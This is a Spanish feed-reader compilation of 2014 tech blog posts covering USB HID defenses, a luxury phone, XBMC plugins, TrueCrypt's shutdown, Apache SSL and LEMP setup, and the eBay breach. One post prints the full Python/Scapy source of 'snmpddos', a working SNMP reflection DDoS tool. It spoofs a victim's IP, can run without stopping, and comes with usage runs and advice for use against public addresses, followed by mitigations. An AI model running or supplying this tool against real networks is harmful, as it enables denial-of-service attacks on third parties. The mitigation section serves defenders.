Figura 6: GPO para prevenir la instalación de dispositivos USB no autorizados

De todas formas, como utilidad de monitorización, Adrian Crenshaw recomienda usar USBDeview, que muestra en tiempo real toda la información de todos los dispositivos USB que se conectan, detectando aquellos que son PHUKD en la lista.

Figura 7: USBDeview

Alex TorreCrack ha hecho una herramienta de protección ante estos ataques que liberará en breve llamada Shielducky que hace fácil controlar estos ataques monitorizando los dispositivos HID sin tener que desactivar los puertos USB desde la BIOS/UEFI, etcétera. La interfaz es bastante amigable y fácil de usar ya que basta como presionar un simple botón para detectar cualquier HID que se conecte y bloquearlo.

Figura 8: Shielducky - una herramienta para bloquear dispositivos USB HID

Así que te recomiendo tener cuidado porque en cualquier momento sin que te des cuenta te pueden intentar  “enchufar” un USB Rubber Ducky en lugar de un pendrive cuando te descuides. Ten cuidado.

Saludos Malignos!
04 Jun 16:53

Vertu prepara el Signature Touch, un móvil de 8.000 euros con una cámara certificada por Hasselblad

by Juan Carlos López

Vertu Signature Touch

Este smartphone es la prueba irrefutable de que el auténtico lujo también tiene cabida en el mercado de los teléfonos móviles. A todos los que un iPhone 5s de Apple, un Xperia Z2 de Sony o un Galaxy S5 de Samsung nos parece caro, el precio del nuevo Signature Touch de la firma inglesa Vertu va a provocar que nos desmayemos: cuesta más de 8.000 euros.

Es evidente que con este precio no está pensado para el gran público. Solo unos pocos ricachones podrán hacerse con él. De hecho, en su fabricación Vertu emplea materiales tan exóticos como el titanio de su chasis, el zafiro que protege su pantalla y la piel que lo embellece. Pero la característica que más llamará la atención a cualquier entusiasta de la fotografía es su cámara de fotos, que ha sido certificada por Hasselblad.

Curiosamente, en la página web del fabricante apenas podemos encontrar información acerca de la cámara trasera de este teléfono. Tan solo sabemos que incorpora un sensor de 13 megapíxeles con doble flash LED, y que la cámara frontal tiene una resolución de 2,1 megapíxeles. Otro detalle de «distinción»: su sonido ha sido calibrado por Bang & Olufsen.

Por lo demás, las especificaciones de este móvil no son nada del otro mundo. De hecho, los últimos smartphones premium que han lanzado marcas como Sony, LG o Samsung lo superan. Tiene un SoC Snapdragon 800 a 2,3 GHz con cuatro núcleos, 2 gigabytes de RAM, 64 gigabytes de almacenamiento y una pantalla Full HD de 4,7 pulgadas. Y vendrá con Android 4.4 KitKat, carga inalámbrica y una batería de 2.275 mAh.

Quizás la colaboración de Hasselblad garantice cierta solvencia al tomar fotografías con él, pero es evidente que su precio lo posiciona como un artículo de lujo sin demasiado atractivo para la mayor parte de nosotros. Estará disponible este mismo mes de junio.

Más información | Vertu
En Xataka Foto | Ya podemos «jugar» con la profundidad de campo en los smartphones con Android 4.4
En Xataka Móvil | El nuevo Vertu Signature Touch de lujo llega con titanio, zafiro y piel por nada menos que 8.000 euros

-
La noticia Vertu prepara el Signature Touch, un móvil de 8.000 euros con una cámara certificada por Hasselblad fue publicada originalmente en Xataka Foto por Juan Carlos López.








04 Jun 09:39

Explotando DDoS usando servidores SNMP

by DragoN

El objetivo de esta entrada es presentar una herramienta que denomine snmpddos.  Esta  herramienta permite utilizar servidores SNMP V2c para realizar un ataque de denegación de servicio distribuido basado en reflexión (SNMP reflected attack);   Antes de enfocarnos en la práctica de este ataque  vamos  a  explicar en qué consiste y como funciona.

Funcionamiento del ataque:

Bueno antes de entender la técnica de DDoS basada en reflexión SNMP, vamos recordar que SNMP es un protocolo de administración, su uso ha sido muy extendido para el monitoreo y supervisión de los dispositivos de red en entornos corporativos, existen tres versiones SNMP V1 (no recomendada), V2c (no recomendada)  y V3 (recomendada), las dos primeras versiones  tienen  autenticación débil (basado en el valor de la comunidad)  y no cifran la información, SNMP utiliza típicamente UDP como protocolo de transporte, utiliza los puertos  UDP/161 y UDP/162 (traps).

Los dos factores determinantes para ejecutar el ataque son los siguientes:

  1. En una comunicación basada en protocolo UDP (no orientada a la conexión) y por motivos de eficiencia, los datos se envían y se reciben sin verificar la conexión con el origen o destino de la misma y se da por hecho la correcta entrega o recepción de datos. Esto nos permite modificar la dirección IP origen dando pie al “IP spoofing”.
  2. Por otra parte el protocolo SNMP permite que se realicen consultas de gran volumen a través del tipo de solicitud llamado  “GetBulkRequest”, esta solicitud  en la V2c se caracteriza por que el tamaño de su respuesta (423-1560 Bytes) es mucho más grande que el de la solicitud (0-102 Bytes), esto significa que existe un efecto de amplificación ya que la respuesta es más grande que la solicitud

De acuerdo a lo explicado, a todas las solicitudes SNMP tipo GetBulkRequest que se hagan a un servidor SNMP modificando la IP origen (IP Spoofing)  por la IP de la víctima, el servidor SNMP responderá con respuestas de gran tamaño a IP la víctima. (tal como lo muestra la siguiente imagen).

Explotando DDoS en servidores SNMP 1 Explotando DDoS usando servidores SNMP
Si esto mismo lo masificamos obtendremos un ataque de denegación distribuido basado en reflexión SNMP, tal como se muestra en la siguiente imagen:

Explotando DDoS en servidores SNMP 2 Explotando DDoS usando servidores SNMP

SCRIPT snmpddos
Este script se encuentra escrito en Python y hace uso de Scapy, funciona perfectamente en Bactrack 5 R3 y KALI. El código se encuentra en GitHub y se puede descargar desde https://github.com/jevalenciap/snmpddos/blob/master/snmpddos.py

# Autor: Juan Esteban Valencia Pantoja jevalenciap at gmail dot com
import sys
import random
import logging # La siguiente  linea es usada para omitir los errores de IPV6 que pueden aparecer por importar scapy.
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import argparse
import os
import urllib2
if os.getuid() != 0: # Valida si el script esta siendo corrido como root
    print("Debes ejecutar este script como root.")
    sys.exit(1)
parser = argparse.ArgumentParser(description='Esta herramienta contruida con fines educacionales permite simular el comportamiento de  un ataque de denegacion de servicio distribuida basado en reflexion utilizando el protocolo SNMP V2c (DDoS SNMP reflected attack). ') # Esta y las siguientes 4 lineas controlan y definen los argumentos ingresados
parser.add_argument('-d', action="store",dest='snmp_server', help='La IP destino del servidor SNMP(argumento mandatorio)')
parser.add_argument('-c', action="store",dest='community', help='La comunidad SNMP(por defecto es public).')
parser.add_argument('-p', action="store",dest='port', help='El puerto destino del servidor SNMP(por defecto es UDP 161).')
parser.add_argument('-v', action="store",dest='victim_IP', help='La IP de la victima que recibira el ataque(argumento mandatorio).')
parser.add_argument('-s', action="store",dest='count', help='La cantidad de paquetes que deseas enviar,puedes enviar infinitos paquetes ingresando  X o x (argumento mandatorio).')
args = parser.parse_args()

if len(sys.argv) == 1: # Obliga a mostrar el texto del 'help' sino hay argumentos ingresados.
    parser.print_help()
    sys.exit(1)
args = vars(args) # Convierte los argumentos en formato diccionario para facil manejo.
iterationCount = 0 # Variable usada en el ciclo while para controlar la cantidad de veces que un paquete es enviado.

oid ="1.3.6.1.2.1.1.1" # El OID conocido como sysDescr fue el que mejores resultados obtuvo en las pruebas de laboratorio.

if args['port' ] == None :
    uport= 161 # Si no se ingresa el puerto, por defecto sera 161/UDP
else:
    uport= int(args['port']) # La variable uport toma el valor del puerto 

if args['community']  == None :
    communi= "public" # Si no se ingresa la comunidad , por defecto sera public
else:
    communi= args['community']

if args['count'] == "X" or args['count'] == "x": # Si se ingresa x o X se enviara infinitos paquetes
      while (1 == 1):
        w =IP(dst=args['snmp_server'],src=args['victim_IP'])/UDP(sport=RandShort(),dport=uport)/SNMP(version="v2c",community=communi,PDU=SNMPbulk(id=RandNum(1,200000000),max_repetitions=100,varbindlist=[SNMPvarbind(oid=ASN1_OID(oid)), SNMPvarbind(oid=ASN1_OID(oid))]))# Esta linea construye el paquete SNMP utilizando los argumentos ingresados
        send(w,  verbose=0) # Envia el paquete
        iterationCount = iterationCount + 1
        print(str(iterationCount) + " Paquete enviado")# Mensaje en pantalla
else: # Se ejecuta si el usuario digita la cantidad de paquetes que va enviar
    while iterationCount < int(args['count']):
        w =IP(dst=args['snmp_server'],src=args['victim_IP'])/UDP(sport=RandShort(),dport=uport)/SNMP(version="v2c",community=communi,PDU=SNMPbulk(id=RandNum(1,200000000),max_repetitions=100,varbindlist=[SNMPvarbind(oid=ASN1_OID(oid)),SNMPvarbind(oid=ASN1_OID(oid) )]))# Se envia paquete SNMP  utilizando los argumentos ingresados
        send(w,  verbose=0) # Envia el paquete
        iterationCount = iterationCount + 1
        print(str(iterationCount) + " Paquete enviado")
print("Todos los paquetes fueron enviados exitosamente.")# Mensaje mostrado cuando todos los paquetes han sido enviados

Utilizando la opción  -h podemos ver las opciones

Explotando DDoS en servidores SNMP 3 Explotando DDoS usando servidores SNMP

En el siguiente ejemplo enviamos 7 solicitudes SNMP tipo GetBulkRequest al servidor  SNMP con IP 10.0.0.1 (Router Cisco), haciendo una suplantación de la IP origen para que todas las respuestas del servidor SNMP sean enviadas a la IP de la víctima es decir a la IP 10.0.0.3. En esta solicitud se utiliza la comunidad SNMP ‘public’, es la que va por defecto si el argumento –c no es especificado, al igual que el puerto destino por defecto es UDP/161 si no es especificado

Explotando DDoS en servidores SNMP 4 Explotando DDoS usando servidores SNMP

En Wireshark podemos ver  que el tamaño de la solicitud es de 97 Bytes.

Explotando DDoS en servidores SNMP 5 Explotando DDoS usando servidores SNMP

En la siguiente imagen podemos ver la respuesta amplificada que le envía el servidor  SNMP (10.0.0.1) a la víctima (10.0.0.3) en donde se aprecia que tiene un tamaño de 1438 Bytes. Adicionalmente la victima envía un paquete ICMP de port unreacheable al servidor SNMP generando tráfico adicional.

Explotando DDoS en servidores SNMP 6 Explotando DDoS usando servidores SNMP

En este último ejemplo a diferencia del anterior se envían paquetes constantemente (argumento –s X), y se especifica la comunidad SNMP en “private” (argumento –c private)

Explotando DDoS en servidores SNMP 7 Explotando DDoS usando servidores SNMP

Cuando se requiera trabajar con  IPs publicas validar que el dispositivo de borde no haga NAT a este tráfico. También no deben existir configuradas ACL en los routers  y demás dispositivos de capa3 del ISP que impidan el  IP spoofing.

Escenarios de ataque

  • -Un atacante que tenga acceso lógico  a una Subred o VLAN de servidores en un entorno corporativo mediano (superior a 100 servidores) donde todos los servidores estén siendo monitoreados a través de SNMP, puede causar alto impacto alto en la disponibilidad de los servicios que ofrece la victima del ataque.
  • Muchos proveedores de servicio de Internet dejan habilitado por defecto SNMP en los enrutadores que instalan nuestras casas para la prestación del servicio, eso quiere decir que tienen configurada la comunidad por defecto llamada “public” y a merced de que sean utilizados para hacerle una denegación de servicio a tu conexión de Internet.
  • Por ultimo tenemos las botnets, que a través de sus consolas de control pueden enviar comandos a las maquinas infectadas (bots) para que generen este tipo de tráfico a la víctima sin que este sea percibido por los bots.

Mitigaciones:

  • No exponer a Internet el protocolo SNMP, recomendable utilizar VPNs IPsec sitio a sitio para comunicar las consolas de administración (NMS) con dispositivos administradoso en su defecto aplicar políticas de Firewall para filtrar solamente el  trafico SNMP a IPs publicas específicas.
  • Utilizar en los ambientes corporativos VLAN o subredes de administración ( SNMP, HTTP, HTTPS, RDP, SSH, TELNET, etc…) y deshabilitar el acceso administrativo a las demás interfaces de red de los servidores o equipos de red.
  • Muchos fabricantes de UTMs y Firewall de nueva generación no permiten IP spoofing por defecto, una buena práctica que evita el IP spoofing  a nivel de Firewall es  siempre especificar el direccionamiento origen en las reglas o políticas que se crean (no dejarlas any).
  • Existen dispositivos comerciales y servicios en la nube especializados en detener ataques DDoS.
  • No utilizar las comunidades por defecto public y private, recuerden que para las V1 y V2 de SNMP el nombre de la comunidad es lo único que se utiliza para autenticarse al servidor SNMP y poder tener acceso a la información  (lectura/escritura)   por lo tanto el valor de la comunidad se debe escoger siguiendo las mismas buenas practicas que para una  contraseña robusta.
  • Utilizar SNMP V3 cifra los datos y  la autenticación es más robusta.
  • Exista una labor muy grande que tienen que hacer los ISP para evitar el IP spoofing en sus dispositivos de red y evitar los ataques DDoS de reflexión.
  • Siempre que se instale una impresora o cualquier dispositivo a la red validar que no tenga habilitado por defecto SNMP.

Articulo escrito por Juan Esteban Valencia Pantoja para La Comunidad DragonJAR

04 Jun 09:02

TVALACARTA 3.3.20

by Laser
TVALACARTA 3.3.19

 Versión 3.3.20 de TVALACARTA con una nueva e interesante opción, la de poder suscribirte a tu programa o serie favorita.

De esta manera a medida que vayan apareciendo nuevos episodios se descargarán automáticamente en segundo plano y podremos acceder a ellos desde la sección DESCARGAS del plugin.


De momento solo está disponible para los canales :
Clan TV, Crackle, Dibujos.tv, Disney Channel Replay, Disney Junior y TVE.
 
Veamos todo esto que comento, en el siguiente vídeo :



Mejoras incluidas en la versión 3.3.20 :

· A3player : Corregido 
· Conectate (Argentina) : Actualizado 
· CYLTV (Castilla y León) : Actualizado 
· Conector con YouTube : Actualizado 
· TVN (Chile) : Actualizado 
· TV3 (Cataluña) : Incluido el conector RTMP para series extranjeras 
· TVE : Corregido 
· TUTEVE (Perú): Actualizado 
· Telefe (Argentina) : Corregido

Descarga para XBMC


* Recordar de que si ya tenéis instalado este plugin no es necesario descargarlo de nuevo, ya que al entrar en el mismo os aparecerá un mensaje advirtiendo de la nueva versión.
04 Jun 09:02

Desactivando módulos innecesarios en Apache

by admin
Tengo un servidor Apache montado en una máquina física muy justita de recursos (especialmente de memoria RAM). El servidor Apache que viene por defecto tendría que cambiarlo por nginx. Por lo que dicen en los mentideros de Internet parece que consume menos recursos que Apache… mientras tomo la decisión de migrar, he optado por recortar […]
04 Jun 08:01

Truecrypt: Una desaparición sin mucho para explicar

by diazepan

TrueCrypt question

Hace unos días se reportaba la misteriosa desaparición de Truecrypt, el famoso software para cifrar discos. En su página de sourceforge dicen que no era seguro y que podía contener vulnerabilidades y que recomiendan el uso de Bitlocker Drive Encryption, que es el software de cifrado que viene por default en Windows Vista, 7 y 8. Incluso mencionan que su desarrollo se detuvo en mayo, después de que se terminara el soporte para Windows XP.

Ahora unos desarrolladores decidieron forkear el código y basarlo en Suiza, mientras que la Gibson Research Corporation dice “No, Truecrypt sigue siendo seguro”, por lo menos hasta que el Open Crypto Audit diga lo contrario. El Open Crypto Audit es un proyecto para auditar el código de Truecrypt, y en Abril comunicaron que la primera parte de la auditoría estaba hecha y de las 11 vulnerabilidades que encontraron, no había ninguna grave.

¿Entonces, que pasa?

Según el intercambio de Tweets entre Steven Barnhart y Matthew Green (quien lidera la Open Crypto Audit), Steven intentó contactar con alguien involucrado y recibió un par de mails de alguien llamado “David”.

¿Qué dice David?: No hay interés. Podría decirse que no hay interés en seguir desarrollando Truecrypt. En otro mail dice que Bitlocker es “lo suficientemente bueno” y que Windows (XP) era el objetivo original del proyecto. También dice que no hubo contacto con el gobierno. Steven le preguntó si estaría dispuesto a relicenciar el código con otra licencia o hacer un fork. David responde que eso sería dañino dado que sólo ellos (los desarrolladores de Truecrypt) son familiares con el código.

Igual, eso es sólo una teoría de por qué desapareció. Existen otras como que consiguieron romper el cifrado, que se conoce la identidad de sus desarrolladores (la marca está registrada al nombre de David Tesarík, quizás sea el mismo que envió los mails), que Dios existe y está del lado de la NSA, etc.

Mientras tanto, para los usuarios de Linux existen varias alternativas (con licencias menos restrictivas que la de truecrypt): dm-crypt, LUKS, eCryptfs, EncFs, RealCrypt (no es más que truecrypt con otra marca), ZuluCrypt y otras más.

La entrada Truecrypt: Una desaparición sin mucho para explicar aparece primero en Desde Linux.

03 Jun 15:42

Crear certificados SSL en Apache (Ubuntu12.04)

by Hernán Chamorro

Primero que nada cabe destacar que esta guía está hecha sobre un sistema Ubuntu 12.04, aunque no imposibilita que los comandos expuestos puedan ser utilizados en versiones anteriores o posteriores.

Hoy en día existen muchos medios por los cuales viaja nuestra información personal. Estando en la era de la información, el usuario necesita confiar en que su información viaje a cualquier lugar del mundo de forma segura e íntegra a través de internet. En la actualidad existen distintas maneras de encriptar información, una de estas maneras son el uso de certificados SSL.

Acerca de los certificados SSL

Un certificado SSL(Secure Socket Layer) es un protocolo criptográfico de seguridad desarrollado originalmente por Netscape, que busca, mediante la codificación de la información del sitio, crear una conexión más segura. Esto se cumple mediante la utilización de una clave de seguridad de 2048 bits que es conocida solo por el usuario y el servidor al que se está conectado.

Para utilizarlo es necesario que la web tenga instalado un sistema de certificados SSL y que el navegador utilizado por los usuarios cuente con soporte para SSL(hoy en día todos los navegadores cuentan con soporte a ésta tecnología).

Rompiendo la inercia

En el caso de que no tengas instalado apache en el servidor, se puede descargar tipeando la siguiente orden:

sudo apt-get install apache2

Activando el módulo SSL

Para habilitar el módulo SSL tecleamos lo siguiente:

sudo a2enmod ssl

Reiniciamos Apache:

sudo service apache2 restart

Almacenamiento de clave y certificado

En este paso tenemos que crear un directorio en donde se almacenará la clave generada por el servidor y el certificado.

Tecleamos:

 

sudo mkdir /etc/apache2/ssl

 

Creando un certificado autofirmado

Cuando solicitamos un nuevo certificado, se puede especificar el tiempo de validez del certificado hasta que expire, e incluyendo si queremos encriptarlo en 2048 bits, aunque esta parte deberíamos dejarla tal como está ya que es lo que se utiliza hoy en día.

Cuando solicitamos un nuevo certificado , podemos especificar el tiempo que el certificado debería seguir siendo válido cambiando el 365 con el número de días que preferimos . Tal y como está este certificado caducará después de un año .

sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/apache2/ssl/apache.key -out /etc/apache2/ssl/apache.crt

Con el siguiente comando vemos que creamos los archivos en donde estará el certificado(apache.crt) y la clave(apache.key), ambos en la misma carpeta.

Este comando le mostrará desde la terminal terminal una lista de campos que necesitan ser llenados.

La línea más importante es ” Common Name ” . Introduzca su nombre de dominio oficial aquí o , si todavía no tiene uno, la dirección IP de su sitio.

 

You are about to be asked to enter information that will be incorporated into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]: AR
State or Province Name (full name) [Some-State]:Buenos Aires
Locality Name (eg, city) []:CABA
Organization Name (eg, company) [Internet Widgits Pty Ltd]:DL Inc
Organizational Unit Name (eg, section) []:Depto de la CABA
Common Name (e.g. server FQDN or YOUR name) []:example.com

Email Address []:webmaster@dlinc.com

Estableciendo el Certificado

Ahora tenemos todos los componentes necesarios para el acabado del certificado. Lo siguiente que hay que hacer es configurar los hosts virtuales para mostrar el nuevo certificado.

Abra el archivo de configuración de SSL:

nano / etc/apache2/sites-available/default-ssl

Dentro de la sección que comienza con <VirtualHost _default_:443> , hacer rápidamente los siguientes cambios…

Añadir una línea con el nombre del servidor justo debajo de la dirección de correo electrónico del administrador del servidor :

ServerName ejemplo.com: 443

Reemplace ejemplo.com con su nombre de dominio DNS aprobado o dirección IP del servidor (debe ser el mismo que el “Common Name” en el certificado ) .

Encuentra las tres líneas siguientes , y asegúrese de que coincidan con las extensiones a continuación:

SSLEngine en

SSLCertificateFile / etc/apache2/ssl/apache.crt

SSLCertificateKeyFile / etc/apache2/ssl/apache.key

Guarde y salga del archivo.

Activando el nuevo host virtual

Antes de que el sitio web que funcionará en el puerto 443 pueda ser activado , necesitamos habilitar el host virtual:

sudo a2ensite default- ssl

Al tener todo configurado, reiniciaremos el servidor Apache que se volverá a cargar con todos los cambios en su lugar.

sudo service apache2 reload

En el navegador , escriba https://sudirección y podrá visualizar el nuevo certificado. Una vez que se ha configurado todo , se puede instalar un servidor FTP.
Espero que lo hayan disfrutado y sea de gran utilidad para aquellos que deseen enseñar con éste material o quieran utilizarlo para sus servidores Apache. Saludos!

26 May 11:27

Cómo obtener espacio de almacenamiento infinito para tus fotos en Google Drive

by Francisco Ruiz

Cómo obtener espacio de almacenamiento infinito para tus fotos en Google Drive

¿Estas buscando un servicio de almacenamiento en la nube gratuito y que te ofrezca espacio de almacenamiento infinito para tus fotografías tomadas con Android?.

Si la respuesta es si deja de buscar por que lo acabas de encontrar, y es que Google Drive te ofrece espacio de almacenamiento infinito para guardar copia de todas tus fotografías tomadas con Android de manera totalmente gratuita. A continuación te explico en detalle los requisitos a cumplir y como activar esta opción desde tu dispositivo.

Requisitos a cumplir

Los requisitos a cumplir para obtener espacio de almacenamiento infinito y gratuito para nuestras fotos tomadas con Android son la mar de simples y se limitan a estos:

  • Tener una cuenta de Gmail.
  • Tener instalada la aplicación de Google+
  • Seguir estos pasos que a continuación os detallo

Cómo conseguir espacio de almacenamiento infinito y gratuito para guardar nuestras fotos en Google Drive

Si cumplimos todos los requisitos arriba expuestos, ya estaremos en disposición de seguir este tutorial, y es que por defecto, el almacenamiento infinito para nuestras fotos a través de Google Drive no viene activado y lo tendremos que hacer de manera manual.

En principio contamos con la característica que Google nos ofrece guardar copias de seguridad en Google Drive de todas nuestras fotos a tamaño real, cosa que tendremos limitado al espacio de almacenamiento de nuestra cuenta de Drive que por defecto son 15 Gb. A continuación les voy a explicar, cómo obtener espacio de almacenamiento infinito o ilimitado, cambiando una opción para que Drive nos guarde las fotos con un tamaño máximo de 2048 píxeles.

Lo primero de todo será abrir la aplicación Fotos que nos viene con la instalación de Google+:

Cómo obtener espacio de almacenamiento infinito para tus fotos en Google Drive

Seguidamente clicamos en el botón menú de la aplicación:

Cómo obtener espacio de almacenamiento infinito para tus fotos en Google Drive

Luego en Ajustes:

Cómo obtener espacio de almacenamiento infinito para tus fotos en Google Drive

Ahora seleccionamos la opción de Copia de seguridad automática:

Cómo obtener espacio de almacenamiento infinito para tus fotos en Google Drive

Y en la nueva pantalla que se nos abre tendremos que, desde la primera opción, seleccionar una de nuestras cuentas de Google para después seleccionar la opción Tamaño de la foto.

Cómo obtener espacio de almacenamiento infinito para tus fotos en Google Drive

Donde seleccionaremos la opción Tamaño estándar.

Cómo obtener espacio de almacenamiento infinito para tus fotos en Google Drive

Por último activamos el botón de la parte superior derecha si es que no lo teníamos ya activado, y ya dispondremos de un espacio de almacenamiento ilimitado y completamente gratuito desde nuestra cuenta de Google y Google Drive.

 

El artículo Cómo obtener espacio de almacenamiento infinito para tus fotos en Google Drive ha sido originalmente publicado en Androidsis.








26 May 10:03

Adventures in Raspberry Pi kits in the Swag Store

by Eben Upton

As many of you know, our very own Carrie Anne Philbin spent most of last year writing Adventures in Raspberry Pi. For some reason she keeps reminding me that, with 4.8 stars out of 5, it’s currently the highest-rated Raspberry Pi book on Amazon; I can’t imagine why.

Five star, schmive star

Five star, schmive star

The last few chapters of the book concentrate on hardware interfacing using the Pi, and require a variety of electronic components. To make your life easier, we’ve assembled all the components into one convenient kit, which you can now buy in the Swag Store.

Cables and buttons and screens, oh my

Cables and buttons and screens, oh my

26 May 09:35

Instalar LEMP en Ubuntu Trusty Tahr

by Joaquín García

Instalar LEMP en Ubuntu Trusty Tahr

Una de las caras más populares de Ubuntu es su desarrollo y dedicación al mundo de los servidores y al mundo empresarial. Dentro de esto, además de tener una versión dedicada en exclusivo al mundo de los servidores, Ubuntu está integrando y actualizando mucho software que se usa para el mundo empresarial y para el profesional de las redes y esto repercute de una manera u otra en los usuarios finales que quieran desarrollar una web o habilitar un servidor casero. La opción más usada para estos últimos usuarios es la instalación de un servidor LAMP en nuestro Ubuntu. La instalación de un servidor LAMP es muy común en las últimas versiones de Ubuntu, tal vez porque si es difícil su instalación, no se usaría en servidores profesionales. Pero ¿ cómo se instala un servidor LEMP? ¿Qué es un servidor LEMP? ¿ Puedo tener un servidor LAMP y LEMP en la misma máquina? Sigue leyendo y descubrirás respuestas a estas preguntas.

¿Qué es un servidor LEMP?

Para los que conozcáis los servidores LAMP, sabéis que son abreviaturas del software que llevar el servidor, en el caso de LAMP es Linux, Apache, Mysql y Php o Python. Es decir, un sistema operativo(Linux), software de gestión de un servidor( Apache), una base de datos( Mysql) y un lenguaje de servidor ( Php o Python). LEMP sería así una variación del paquete de software que trae LAMP, así, LEMP sería Linux, EngineX ( Nginx), Maríadb o Mysql y Php o Python. La única variación respecto a LAMP es que LEMP usa Nginx y no Apache como software encargado de gestionar el servidor, que para los novatos, comentar que es un gran cambio. Llegados a este punto, ¿ podría tener LAMP y LEMP en el mismo servidor? Por poder podrías tenerlo, sin embargo en pocas sesiones si no es en la primera, el servidor se colapsaría ya que se tiene dos gestores de servidores. Así, lo más recomendable es decantarse por uno u otro.

En los últimos meses, Nginx parece que está siendo la opción más deseada en el ámbito comercial, por lo que la solución LEMP parece que será el futuro, pero ¿ Cómo se instala?

Instalación de un servidor LEMP

El método más cómodo para instalar un servidor bien sea LAMP o LEMP es a golpe de teclado y terminal, por lo que abrimos la terminal y escribimos:

sudo apt-get install nginx

Nginx ya se encuentra en los repositorios oficiales, por lo que no hay problema. Ahora paramos, encendemos y reiniciamos el servidor Nginx para que Ubuntu empiece a reconocerlo y a introducirlo en su inicio, así pues escribimos:

sudo service nginx stop

sudo service nginx start

sudo service nginx restart

sudo update-rc.d nginx defaults

Y si esto resulta, deberíais ver un mensaje similar a este:

System start/stop links for /etc/init.d/nginx already exist.

Ahora tenemos que instalar el resto de herramientas del servidor LEMP. Seguiremos por Php, si bien existe la opción de instalar Python, para el desarrollo web suelen decantarse por php aunque las dos son iguales de buenas.

sudo apt-get install  php5 php5-cgi spawn-fcgi

sudo service nginx restart

Y finalmente instalamos la base de datos, podemos elegir entre MariaDB y Mysql, prácticamente son las mismas, con la diferencia que usa es comunitaria mientras que la Mysql es de una empresa. En esta caso instalamos Mysql por no tener complicaciones más adelante, pero puede valer cualquiera de las dos opciones

sudo apt-get install mysql-server mysql-client php5-mysql phpmyadmin

sudo service nginx restart

Este último paquete es el encargado de gestionar nuestra base de datos a través del navegador. Ahora ya está listo nuestro ordenador y nuestro Ubuntu 14.04 para funcionar como un servidor. Recordad que para comprobar que funciona tenemos que escribir en el navegador localhost y veremos una pantalla en la que aparece las letras Its Works! Además para ver las webs que creamos, tenemos que guardarlo en la carpeta /var/www de nuestro sistema. Ahora a disfrutad de Ubuntu Trusty y de LEMP!

El artículo Instalar LEMP en Ubuntu Trusty Tahr ha sido originalmente publicado en Ubunlog.

22 May 21:43

Addappt llega a android para sincronizar la libreta de direcciones de vuestros contactos

by Manuel Ramírez

Pinche aquí para ver el vídeo

La mayoría de los usuarios en Android ya están acostumbrados a usar la sincronización de la cuenta de Google para tener en ella todos sus contactos sin tener que hacer nada realmente especial cuando hemos adquirido un nuevo teléfono, para que así tengamos la lista de contactos totalmente actualizada. Una de las mejores facetas que puede otorgar Google con su cuenta Gmail o mismamente algunas de las redes sociales como puede ser Facebook.

Addappt de lo que se encarga es de sincronizar privadamente vuestra información de contacto con amigos y compañeros de trabajo, funcionando más como si fuera una agenda de contactos en vez de una red social. De esta forma no se necesita “atar” todos vuestros datos a una cuenta de una red social con la mayoría de todas las entradas que hagáis en ella. Una aplicación que ya lleva más de un año en iOS, pero que hoy ha recibido una actualización mayor llegando finalmente a Android.

Para poder usar Addappt, tanto vosotros como vuestros contactos deben verificar una dirección de correo electrónico principal. Entonces todos enviarán las invitaciones para que se conecten, para que después de esto, cuando alguno quiera actualizar su propia información de contacto, los datos automáticamente cambiarán en los demás dispositivos.

Addappt

La compañía guardará esta información privadamente y no será cargada a ninguno de sus servidores. Addappt también ofrece soporte para agrupar a una serie de contactos en un mismo grupo para enviar mensajes a todos de una vez. La funcionalidad es gratuita para todos y no encontraréis ningún tipo de publicidad dentro de la aplicación.

Si queréis optar a otra manera de poder tener sincronizada vuestra información de contacto tanto como la de vuestros amigos, familiares o compañeros, desde el widget a continuación encontraréis el acceso directo a la aplicación en la Play Store.

addappt
Precio: Gratis

El artículo Addappt llega a android para sincronizar la libreta de direcciones de vuestros contactos ha sido originalmente publicado en Androidsis.








22 May 21:34

PALCO TV 0.2.6 : Ahora con Buscador Integrado

by Laser

Nueva versión de PALCO TV 

Se trata de la versión 0.2.6 de uno de los plugins con mas proyección de este año.


Si aún no sabes de que trata este plugin puedes leer el siguiente articulo.





Veamos las novedades que incluye la versión 0.2.6 :

· Nuevo buscador de canales añadido a la sección de "Listas M3U".
· Las listas ahora se descargan y se abren automaticamente.
· Correcciones generales del plugin y mejoras de parseo de listas.

- Actualizado : Versión 0.2.61 -

 Descarga para XBMC


- Repositorio -

 Descarga para XBMC


- Referencia -


22 May 07:09

Si tienes cuenta de eBay apresúrate a cambiar tu contraseña

by 21lucky10

eBay ha reportado que hace un par de meses Hackers lograron violar su seguridad y robaron una base de datos con información acerca de sus usuarios

hackean ebay

eBay ha salido a anunciar el día de hoy que fue víctima de un ataque por parte de hackers que lograron robar una base de datos con los nombres de sus usuarios, contraseñas, correos electrónicos, direcciones, números telefónicos y fechas de nacimiento. La compañía aclaro que las contraseñas están encriptadas pero no puede asegurar que los hackers no serán capaces de desencriptarlas y obtener las contraseñas. Como medida de protección, la compañía ha decidido resetear las contraseñas de todos sus usuarios registrados y les pide a sus usuarios que cambien su contraseña.

eBay no menciono cuantos de sus 148 millones de usuarios se vieron afectados por el robo de la base de datos pero una representante de la compañía menciono que el ataque afecta a “un gran número de cuentas”

PayPal, una subsidiaria de eBay, menciono que sus sistemas no se vieron afectados por los hackers ya que la información de los usuarios de PayPal se almacena en servidores diferentes.

Se descubrió que para tener acceso a la base de datos de eBay, los hackers lograron obtener la información de acceso de algunos empleados de la compañía.

A pesar de que los hackers robaron la base de datos a finales del mes de Febrero o principios de Marzo, no fue hasta hace dos semanas que descubrieron que algunas credenciales de empleados de eBay habían sido robadas por lo que iniciaron una investigación a fondo de sus sistemas y fue así como descubrieron la gravedad del ataque.

La buena noticia para los usuarios de eBay es que las contraseñas estaban encriptadas por lo que los criminales tendrán que trabajar mucho para tener acceso a la información. Además, las contraseñas de eBay están por arriba del promedio en cuanto a su complejidad se refiera así que será aún más difícil para los hackers poder desencriptarlas.

hacker

Pero aunque nunca hayan podido tener acceso a las contraseñas, los hackers todavía tienen acceso a los nombres, direcciones, correos y teléfonos de los usuarios así que debes estar muy atento si es que recibes llamadas sospechosas o promociones en nombre de eBay.

Por último, hasta el momento eBay no ha detectado un incremento en las actividades fraudulentas en eBay.

21 May 16:19

Radar Beep

by Joan Carballo

